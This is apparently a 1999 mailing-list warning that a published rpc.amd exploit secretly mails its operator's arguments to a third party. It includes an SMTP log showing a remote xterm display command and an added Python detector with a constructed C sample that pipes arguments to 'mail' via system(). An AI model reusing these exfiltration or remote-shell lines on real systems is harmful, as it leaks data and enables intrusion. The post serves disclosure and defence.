Hello,
Sorry if this was already known.

Recently someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount).
While testing this exploit on my own server, I saw
that I was opening a connection to ohhara.postech.ac.kr
on port 25. After a little research I found out that
the exploit (in its original form) was sending an email to
[EMAIL PROTECTED] and listing the arguments I
just entered.
There is an easy way to stop it from sending:

Just comment out the line: system(cmd);

Here's the log as I got it from sniffit:
EHLO BlackMesa.com
MAIL From:<[EMAIL PROTECTED]> SIZE=95
RCPT To:<[EMAIL PROTECTED]>
DATA
Received: (from root@localhost)
        by BlackMesa.com (8.9.3/8.9.3) id FAA01208
        for [EMAIL PROTECTED]; Sat, 4 Sep 1999 05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56 +0200
From: locke <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]

10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
.
QUIT
QUIT

(IPs changed to protect the innocent)
                                        Bye                               
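
Added example, not part of the original post and not code from the exploit: a small Python pre-run check that lists live shell-out calls and mail-related string literals in downloaded C proof-of-concept source, so a hidden system(cmd) like the one described above shows up before the code is compiled. The function names, the SAMPLE source and the address in it are constructed for illustration.

```python
import re

# Calls that let a C program run shell commands or open network connections.
RISKY_CALLS = ("system", "popen", "execl", "execlp", "execv", "execvp",
               "connect", "gethostbyname")
CALL_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")
STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
# Mail commands or e-mail addresses inside a string literal.
MAIL_RE = re.compile(r"\b(?:mail|mailx|sendmail)\b|[\w.+-]+@[\w.-]+\.\w+")
# String/char literals or comments, whichever starts first in the text.
TOKEN_RE = re.compile(
    r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|/\*.*?\*/|//[^\n]*', re.S)

def strip_comments(src):
    """Blank out C comments, keeping literals and line numbers intact."""
    def keep(m):
        tok = m.group(0)
        return tok if tok[0] in "\"'" else re.sub(r"[^\n]", " ", tok)
    return TOKEN_RE.sub(keep, src)

def audit(src):
    """Return (line, kind, detail) for each live risky call or mail string."""
    findings = []
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        for m in CALL_RE.finditer(line):
            findings.append((lineno, "call", m.group(1)))
        for literal in STRING_RE.findall(line):
            if MAIL_RE.search(literal):
                findings.append((lineno, "string", literal))
    return findings

# Constructed sample: a PoC-style file that mails its arguments to a third
# party (placeholder address), the behaviour reported in the post above.
SAMPLE = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[512];
    /* constructed phone-home: mails the operator's arguments away */
    snprintf(cmd, sizeof cmd, "echo '%s %s' | mail collector@example.invalid", argv[1], argv[2]);
    system(cmd);
    return 0;
}
'''

if __name__ == "__main__":
    for lineno, kind, detail in audit(SAMPLE):
        print(f"line {lineno}: {kind}: {detail}")
```

Once the system(cmd); line is commented out, the call finding disappears while the mail string is still reported, which is a reminder to read what the string was built for.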
